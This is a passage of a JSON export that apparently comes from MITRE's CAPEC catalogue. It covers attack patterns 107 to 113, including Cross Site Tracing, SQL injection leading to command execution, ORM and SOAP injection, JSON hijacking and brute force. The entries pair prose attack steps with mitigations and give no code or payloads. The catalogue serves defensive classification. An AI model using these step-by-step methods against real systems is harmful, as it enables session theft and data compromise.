Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Status, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required"}]}},"107":{"ID":"107","Name":"Cross Site Tracing","Abstraction":"Detailed","Status":"Draft","Description":"Cross Site Tracing (XST) enables an adversary to steal the victim\'s session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim\'s browser communicates to a destination system\'s web server. The adversary uses an XSS attack to have victim\'s browser sent an HTTP TRACE request to a destination web server, which will proceed to return a response to the victim\'s web browser that contains the original HTTP request in its body. Since the HTTP header of the original HTTP TRACE request had the victim\'s session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary\'s malicious site. XST becomes relevant when direct access to the session cookie via the \\"document.cookie\\" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get their malicious script to issue an HTTP TRACE request to the destination system\'s web server.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"593"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine if HTTP Trace is enabled] Determine if HTTP Trace is enabled at the web server with which the victim has an active session","Technique":"An adversary may issue an HTTP Trace request to the target web server and observe if the response arrives with the original request in the body of the response."},{"Step":"2","Phase":"Experiment","Description":"[Identify mechanism to launch HTTP Trace request] The adversary attempts to force the victim to issue an HTTP Trace request to the targeted application.","Technique":"The adversary probes for cross-site scripting vulnerabilities to force the victim into issuing an HTTP Trace request."},{"Step":"3","Phase":"Exploit","Description":"[Create a malicious script that pings the web server with HTTP TRACE request] The adversary creates a malicious script that will induce the victim\'s browser to issue an HTTP TRACE request to the destination system\'s web server. The script will further intercept the response from the web server, pick up sensitive information out of it, and forward to the site controlled by the adversary.","Technique":"The adversary\'s malicious script circumvents the httpOnly cookie attribute that prevents from hijacking the victim\'s session cookie directly using document.cookie and instead leverages the HTTP TRACE to catch this information from the header of the HTTP request once it is echoed back from the web server in the body of the HTTP TRACE response."},{"Step":"4","Phase":"Exploit","Description":"[Execute malicious HTTP Trace launching script] The adversary leverages an XSS vulnerability to force the victim to execute the malicious HTTP Trace launching script"},{"Step":"5","Phase":"Exploit","Description":"[Intercept HTTP TRACE response] The adversary\'s script intercepts the HTTP TRACE response from teh web server, glance sensitive information from it, and forward that information to a server controlled by the adversary."}]},"Prerequisites":{"Prerequisite":["HTTP TRACE is enabled on the web server","The destination system is susceptible to XSS or an adversary can leverage some other weakness to bypass the same origin policy","Scripting is enabled in the client\'s browser","HTTP is used as the communication protocol between the server and the client"]},"Skills_Required":{"Skill":["Understanding of the HTTP protocol and an ability to craft a malicious script",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Administrators should disable support for HTTP TRACE at the destination\'s web server. Vendors should disable TRACE by default.","Patch web browser against known security origin policy bypass exploits."]},"Example_Instances":{"Example":{"p":["An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim\'s authentication cookie. An adversary realizes that since httpOnly attribute is set on the user\'s cookie, it is not possible to steal it directly with their malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim\'s IE browser to issue an HTTP TRACE to the target system\'s server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim\'s session cookie to impersonate the victim in the target system.","In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that they control and get it to execute in the victim\'s browser (if they can trick the victim\'s into visiting their malicious website or clicking on the link that they supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the adversary\'s malicious script cannot directly issue an HTTP TRACE request to the destination system\'s web server because the malicious script did not originate at that domain. An adversary will then need to find a way to exploit another weakness that would enable them to circumvent the same origin policy protection."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"693"},{"CWE_ID":"648"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Cross Site Tracing"}},"References":{"Reference":{"External_Reference_ID":"REF-3"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Related_Attack_Patterns, Taxonomy_Mappings"}]}},"108":{"ID":"108","Name":"Command Line Execution through SQL Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"66"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Probe for SQL Injection vulnerability] The attacker injects SQL syntax into user-controllable data inputs to search unfiltered execution of the SQL syntax in a query."},{"Step":"2","Phase":"Exploit","Description":"[Achieve arbitrary command execution through SQL Injection with the MSSQL_xp_cmdshell directive] The attacker leverages a SQL Injection attack to inject shell code to be executed by leveraging the xp_cmdshell directive."},{"Step":"3","Phase":"Exploit","Description":"[Inject malicious data in the database] Leverage SQL injection to inject data in the database that could later be used to achieve command injection if ever used as a command line argument"},{"Step":"4","Phase":"Exploit","Description":"[Trigger command line execution with injected arguments] The attacker causes execution of command line functionality which leverages previously injected database content as arguments."}]},"Prerequisites":{"Prerequisite":["The application does not properly validate data before storing in the database","Backend application implicitly trusts the data stored in the database","Malicious data is used on the backend as a command line argument"]},"Skills_Required":{"Skill":["The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Disable MSSQL xp_cmdshell directive on the database","Properly validate the data (syntactically and semantically) before writing it to the database.","Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument)."]},"Example_Instances":{"Example":{"p":["SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).","Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6799"]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"89"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"78"},{"CWE_ID":"114"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}}},"109":{"ID":"109","Name":"Object Relational Mapping Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject their own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"66"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Persistence Framework Used] An attacker tries to determine what persistence framework is used by the application in order to leverage a weakness in the generated data access layer code or a weakness in a way that the data access layer may have been used by the developer.","Technique":"An attacker provides input to the application in an attempt to induce an error screen that reveals a stack trace that gives an indication of the automated data access layer used. Or an attacker may simply make some educated guesses and assume, for instance, that Hibernate is used and try to craft an attack from there."},{"Step":"2","Phase":"Explore","Description":"[Probe for ORM Injection vulnerabilities] The attacker injects ORM syntax into user-controllable data inputs of the application to determine if it is possible modify data query structure and content."},{"Step":"3","Phase":"Exploit","Description":"[Perform SQL Injection through the generated data access layer] An attacker proceeds to exploit a weakness in the generated data access methods that does not properly separate control plane from the data plan, or potentially a particular way in which developer might have misused the generated code, to modify the structure of the executed SQL queries and/or inject entirely new SQL queries.","Technique":"An attacker uses normal SQL injection techniques and adjusts them to reflect the type of data access layer generation framework used by the application."}]},"Prerequisites":{"Prerequisite":["An application uses data access layer generated by an ORM tool or framework","An application uses user supplied data in queries executed against the database","The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework"]},"Skills_Required":{"Skill":["Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework","Ensure to keep up to date with security relevant updates to the persistence framework used within your application."]},"Example_Instances":{"Example":"When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"20"},{"CWE_ID":"89"},{"CWE_ID":"564"}]},"References":{"Reference":{"External_Reference_ID":"REF-4","Section":"Testing for ORM Injection (OWASP-DV-007)"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"110":{"ID":"110","Name":"SQL Injection through SOAP Parameter Tampering","Abstraction":"Detailed","Status":"Draft","Description":"An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"66"},{"Nature":"CanPrecede","CAPEC_ID":"108"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Detect Incorrect SOAP Parameter Handling] The attacker tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.","Technique":"The attacker tampers with the SOAP message parameters by injecting some special characters such as single quotes, double quotes, semi columns, etc. The attacker observes system behavior."},{"Step":"2","Phase":"Experiment","Description":"[Probe for SQL Injection vulnerability] The attacker injects SQL syntax into vulnerable SOAP parameters identified during the Explore phase to search for unfiltered execution of the SQL syntax in a query."},{"Step":"3","Phase":"Exploit","Description":"[Inject SQL via SOAP Parameters] The attacker injects SQL via SOAP parameters identified as vulnerable during Explore phase to launch a first or second order SQL injection attack.","Technique":"An attacker performs a SQL injection attack via the usual methods leveraging SOAP parameters as the injection vector. An attacker has to be careful not to break the XML parser at the service provider which may prevent the payload getting through to the SQL query. The attacker may also look at the WSDL for the web service (if available) to better understand what is expected by the service provider."}]},"Prerequisites":{"Prerequisite":["SOAP messages are used as a communication mechanism in the system","SOAP parameters are not properly validated at the service provider","The service provider does not properly utilize parameter binding when building SQL queries"]},"Skills_Required":{"Skill":["If the attacker is able to gain good understanding of the system\'s database schema",{"Level":"Medium"},"If the attacker has to perform Blind SQL Injection",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Properly validate and sanitize/reject user input at the service provider.","Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers\' supplied data from controlling the structure of the executed query.","At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly."]},"Example_Instances":{"Example":"An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. They notice that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies their payment amount in the travel system\'s database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system\'s database, perhaps by exploiting another weakness that results in information disclosure."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"89"},{"CWE_ID":"20"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Skills_Required"}]}},"111":{"ID":"111","Name":"JSON Hijacking (aka JavaScript Hijacking)","Abstraction":"Standard","Status":"Draft","Description":"An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser\'s Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website. An attacker gets the victim to visit their malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers\' server. There is nothing in the browser\'s security model to prevent the attackers\' malicious JavaScript code (originating from attacker\'s domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system\'s domain), read its contents and transmit to the attackers\' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Understand How to Request JSON Responses from the Target System] An attacker first explores the target system to understand what URLs need to be provided to it in order to retrieve JSON objects that contain information of interest to the attacker.","Technique":"An attacker creates an account with the target system and observes requests and the corresponding JSON responses from the server. Understanding how to properly elicit responses from the server is crucial to the attackers\' ability to craft the exploit."},{"Step":"2","Phase":"Experiment","Description":["[Craft a malicious website]",{"p":["The attacker crafts a malicious website to which they plan to lure the victim who is using the vulnerable target system. The malicious website does two things:","This attack step leverages the fact that the same origin policy in the browser does not protect JavaScript originating from one domain from setting up an environment to intercept and access JSON objects arriving from a completely different domain."],"div":{"style":"margin-left:10px;","ul":{"li":["1. Contains a hook that intercepts incoming JSON objects, reads their contents and forwards the contents to the server controlled by the attacker (via a new XMLHttpRequest).","2. Uses the script tag with a URL in the source that requests a JSON object from the vulnerable target system. Once the JSON object is transmitted to the victim\'s browser, the malicious code (as described in step 1) intercepts that JSON object, steals its contents, and forwards to the attacker."]}}}]},{"Step":"3","Phase":"Exploit","Description":"[Launch JSON hijack] An attacker lures the victim to the malicious website or leverages other means to get their malicious code executing in the victim\'s browser. Once that happens, the malicious code makes a request to the victim target system to retrieve a JSON object with sensitive information. The request includes the victim\'s session cookie if the victim is logged in.","Technique":"An attacker employs a myriad of standard techniques to get the victim to visit their malicious site or by some other means get the attackers\' malicious code executing in the victim\'s browser."}]},"Prerequisites":{"Prerequisite":["JSON is used as a transport mechanism between the client and the server","The target server cannot differentiate real requests from forged requests","The JSON object returned from the server can be accessed by the attackers\' malicious code via a script tag"]},"Skills_Required":{"Skill":["Once this attack pattern is developed and understood, creating an exploit is not very complex.The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim\'s session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.","On the client side, the system\'s design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).","Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session.","Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario."]},"Example_Instances":{"Example":{"p":["Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim\'s address book. An attacker could send an e-mail to the victim\'s Gmail account (which ensures that the victim is logged in to Gmail when they receive it) with a link to the attackers\' malicious site. If the victim clicked on the link, a request (containing the victim\'s authenticated session cookie) would be sent to the Gmail servers to fetch the victim\'s address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.","When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers\' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser\'s same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers\' own constructor in order to gain access to the JSON object\'s contents. These contents could then be transferred to the site controlled by the attacker."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"352"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Related_Attack_Patterns"}]}},"112":{"ID":"112","Name":"Brute Force","Abstraction":"Meta","Status":"Draft","Description":"In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset. Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers\' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information.","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine secret testing procedure] Determine how a potential guess of the secret may be tested. This may be accomplished by comparing some manipulation of the secret to a known value, use of the secret to manipulate some known set of data and determining if the result displays specific characteristics (for example, turning cryptotext into plaintext), or by submitting the secret to some external authority and having the external authority respond as to whether the value was the correct secret. Ideally, the attacker will want to determine the correctness of their guess independently since involvement of an external authority is usually slower and can provide an indication to the defender that a brute-force attack is being attempted.","Technique":"Determine if there is a way to parallelize the attack. Most brute force attacks can take advantage of parallel techniques by dividing the search space among available resources, thus dividing the average time to success by the number of resources available. If there is a single choke point, such as a need to check answers with an external authority, the attackers\' position is significantly degraded."},{"Step":"2","Phase":"Explore","Description":"[Reduce search space] Find ways to reduce the secret space. The smaller the attacker can make the space they need to search for the secret value, the greater their chances for success. There are a great many ways in which the search space may be reduced.","Technique":["If possible, determine how the secret was selected. If the secret was determined algorithmically (such as by a random number generator) the algorithm may have patterns or dependencies that reduce the size of the secret space. If the secret was created by a human, behavioral factors may, if not completely reduce the space, make some types of secrets more likely than others. (For example, humans may use the same secrets in multiple places or use secrets that look or sound familiar for ease of recall.)","If the secret was chosen algorithmically, cryptanalysis can be applied to the algorithm to discover patterns in this algorithm. (This is true even if the secret is not used in cryptography.) Periodicity, the need for seed values, or weaknesses in the generator all can result in a significantly smaller secret space.","If the secret was chosen by a person, social engineering and simple espionage can indicate patterns in their secret selection. If old secrets can be learned (and a target may feel they have little need to protect a secret that has been replaced) hints as to their selection preferences can be gleaned. These can include character substitutions a target employs, patterns in sources (dates, famous phrases, music lyrics, family members, etc.). Once these patterns have been determined, the initial efforts of a brute-force attack can focus on these areas.","Some algorithmic techniques for secret selection may leave indicators that can be tested for relatively easily and which could then be used to eliminate large areas of the search space for consideration. For example, it may be possible to determine that a secret does or does not start with a given character after a relatively small number of tests. Alternatively, it might be possible to discover the length of the secret relatively easily. These discoveries would significantly reduce the search space, thus increasing speed with which the attacker discovers the secret."]},{"Step":"3","Phase":"Explore","Description":"[Expand victory conditions] It is sometimes possible to expand victory conditions. For example, the attacker might not need to know the exact secret but simply needs a value that produces the same result using a one-way function. While doing this does not reduce the size of the search space, the presence of multiple victory conditions does reduce the likely amount of time that the attacker will need to explore the space before finding a workable value."},{"Step":"4","Phase":"Exploit","Description":"[Gather information so attack can be performed independently.] If possible, gather the necessary information so a successful search can be determined without consultation of an external authority. This can be accomplished by capturing cryptotext (if the goal is decoding the text) or the encrypted password dictionary (if the goal is learning passwords)."}]},"Prerequisites":{"Prerequisite":"The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct."},"Skills_Required":{"Skill":["The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures."},"Indicators":{"Indicator":["Repeated submissions of incorrect secret values may indicate a brute force attack. For example, repeated bad passwords when accessing user accounts or repeated queries to databases using non-existent keys.","Attempts to download files protected by secrets (usually using encryption) may be a precursor to an offline attack to break the file\'s encryption and read its contents. This is especially significant if the file itself contains other secret values, such as password files.","If the attacker is able to perform the checking offline then there will likely be no indication that an attack is ongoing."]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.","Use a secret space that is well known and with no known patterns that may reduce functional size.","Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"330"},{"CWE_ID":"326"},{"CWE_ID":"521"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"11","Entry_Name":"Brute Force"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Brute force attack"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Mitigations, Taxonomy_Mappings"}]}},"113":{"ID":"113","Name":"Interface Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An adversary manipulates the use or processing of an interface (e.g. Application Programming Interface (API) or System-on-Chip (SoC)) resulting in an adverse impact upon the security of the system implementing the interface. This can allow the adversary to bypass access control and/or execute functionality not intended by the interface implementation, possibly compromising the system which integrates the interface. Interface manipulation can take on a number of forms including forcing the unexpected use of an interface or the use of an interface in an unintended way.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target system must expose interface functionality in a manner that can be discovered and manipulated by an adversary. This may require reverse engineering the interface or decrypting/de-obfuscating client-server exchanges."},"Resources_Required":{"Resource":"The requirements vary depending upon the nature of the interface. For example, application-layer APIs related to the processing of the HTTP protocol may require one or more of the following: an Adversary-In-The-Middle (CAPEC-94) proxy, a web browser, or a programming/scripting language."},"Example_Instances":{"Example":["An adversary may make a request to an application that leverages a non-standard API that is known to incorrectly validate its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution.","API methods not intended for production, such as debugging or testing APIs, may not be disabled when deploying in a production environment. As a result, dangerous functionality can be exposed within the production environment, which an adversary can leverage to execute additional attacks.","SoC components contain insufficient identifiers, which allows an adversary to reset the device at will or read sensitive data from the device."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1192"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content 